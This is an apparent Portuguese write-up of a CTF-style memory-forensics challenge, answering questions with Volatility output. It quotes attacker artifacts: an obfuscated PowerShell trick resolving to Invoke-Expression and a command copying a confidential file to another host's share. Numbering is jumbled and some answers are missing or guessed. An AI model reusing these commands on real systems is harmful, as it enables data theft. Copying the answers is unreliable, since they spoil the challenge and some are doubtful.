LinkedinTryHackme

Recollection

Classificação: Easy

Categoria: DFIR

Cenário:

Um membro júnior da nossa equipe de segurança realizou pesquisas e testes no que acreditamos ser um sistema operacional antigo e inseguro. Acreditamos que ele possa ter sido comprometido e conseguimos recuperar um dump de memória do sistema. Queremos confirmar quais ações foram realizadas pelo invasor e se outros ativos em nosso ambiente podem ter sido afetados. Por favor, responda às perguntas abaixo.

Questões

1- Qual é o sistema operacional da máquina?

  • Para identificar o sistema operacional da máquina analisada, foi utilizado o Volatility com o plugin imageinfo, responsável por inferir o perfil do sistema a partir das estruturas presentes na memória.

  • O comando executado foi:

  • A saída do plugin indicou os seguintes perfis compatíveis, com maior probabilidade:

    Windows 7

2- Quando foi criado o despejo de memória?

3- Após obter acesso à máquina, o invasor copiou um comando PowerShell ofuscado para a área de transferência. Qual era o comando?

  • Durante a análise do dump de memória, foi utilizada a ferramenta Volatility para inspecionar o conteúdo da área de transferência.

Resposta: (gv 'MDR').naMe[3,11,2]-joIN''

4- O atacante copiou o comando ofuscado para usá-lo como um alias para um cmdlet do PowerShell. Qual é o nome do cmdlet?

Funciona da seguinte forma:

  • gv é o alias de Get-Variable

  • A variável que corresponde a MDR contém uma string interna

  • A indexação [3,11,2] seleciona caracteres específicos dessa string

  • O -join '' concatena os caracteres resultando em iex

Resposta: Invoke-Expression

5- Um comando CMD foi executado para tentar exfiltrar um arquivo. Qual é a linha de comando completa?

  • Durante a análise do dump de memória, foi investigada a execução de comandos CMD.exe com o objetivo de identificar possíveis tentativas de exfiltração de arquivos.

  • Utilizando o Volatility, foram analisados artefatos de histórico de console e linhas de comando por meio dos plugins apropriados, como consoles:

  • A análise revelou a execução de um comando CMD utilizado para exfiltrar um arquivo: type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt

9- Após executar o comando acima, informe-nos se o arquivo foi exfiltrado com sucesso?

No

10- O atacante tentou criar um arquivo readme. Qual era o caminho completo do arquivo?

  • Durante a análise do dump de memória, foi identificado um comando PowerShell executado a partir do CMD, conforme artefatos recuperados pelo plugin consoles do Volatility.

  • O conteúdo Base64 foi decodificado, revelando a tentativa de criação de um arquivo readme por meio do redirecionamento de saída.

  • O comando PowerShell ofuscado em Base64 foi decodificado utilizando PowerShell, revelando a tentativa de criação do arquivo: C:\Users\Public\Office\readme.txt

8- Qual era o nome do host da máquina?

Resposta: USER-PC

9- Quantas contas de usuário havia na máquina?

Resposta: 3

10- Na pasta "\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge" havia algumas subpastas contendo um arquivo chamado passwords.txt. Qual era o caminho completo do arquivo?

  • Durante a análise do dump de memória, foi utilizada a ferramenta Volatility para enumerar arquivos em memória por meio do plugin filescan, com filtragem por passwords.txt.

  • A análise identificou o caminho completo do arquivo localizado em uma subpasta do Microsoft Edge, sob o diretório: \Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt

11- Um arquivo executável malicioso foi executado usando o comando. O nome do arquivo executável EXE era o seu próprio valor de hash. Qual era o valor de hash?

  • Durante a análise do dump de memória, foi investigada a execução de um arquivo executável malicioso cujo nome do arquivo EXE correspondia ao seu próprio valor de hash, técnica comumente usada para dificultar identificação baseada em nome.

Resposta: b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1

12- Na sequência da pergunta anterior, qual é o Imphash do arquivo malicioso que você encontrou acima?

  • Após identificar o executável malicioso cujo nome correspondia ao seu próprio valor de hash, o arquivo foi pesquisado no VirusTotal para obtenção de informações adicionais.

Resposta: d3b592cd9481e4f053b5362e22d61595

13- Na sequência da pergunta anterior, informe-nos a data em formato UTC em que o arquivo malicioso foi criado.

Resposta: 2022-06-22 11:49:04

14- Qual era o endereço IP local da máquina?

  • A enumeração foi conduzida por meio do plugin netscan, que permite identificar sockets, conexões ativas e endereços IP associados ao host no momento da captura da memória:

Resposta: 192.168.0.104

15- Existiam vários processos do PowerShell, sendo que um deles era um processo filho. Qual era o processo pai desse processo filho?

  • A enumeração foi realizada por meio dos plugins pstree e pslist, que permitem identificar processos pai e filho com base nos identificadores de processo (PID/PPID):

Resposta: cmd.exe

16- O invasor pode ter usado um endereço de e-mail para acessar uma rede social. Você pode nos informar o endereço de e-mail?

  • Ferramentas do Volatility foram utilizadas para localizar possíveis endereços de e-mail presentes em memória, por meio de buscas por padrões típicos (@):

17- Utilizando o navegador MS Edge, a vítima pesquisou sobre uma solução SIEM. Qual é o nome da solução SIEM?

  • Deduzi logo que era o Wazuh

18- O usuário vítima baixou um arquivo executável (.exe). O nome do arquivo imitava um binário legítimo da Microsoft, com um erro de digitação (ou seja, o binário legítimo é powershell.exe e o atacante nomeou o malware como powershall.exe). Qual era o nome do arquivo, incluindo a extensão?

  • Arquivo csrss.exe totalmente fora do comun, já que esse arquivo reside somente no diretório C:\Windows\System32

PreviousCampfire-1NextLogJammer

Last updated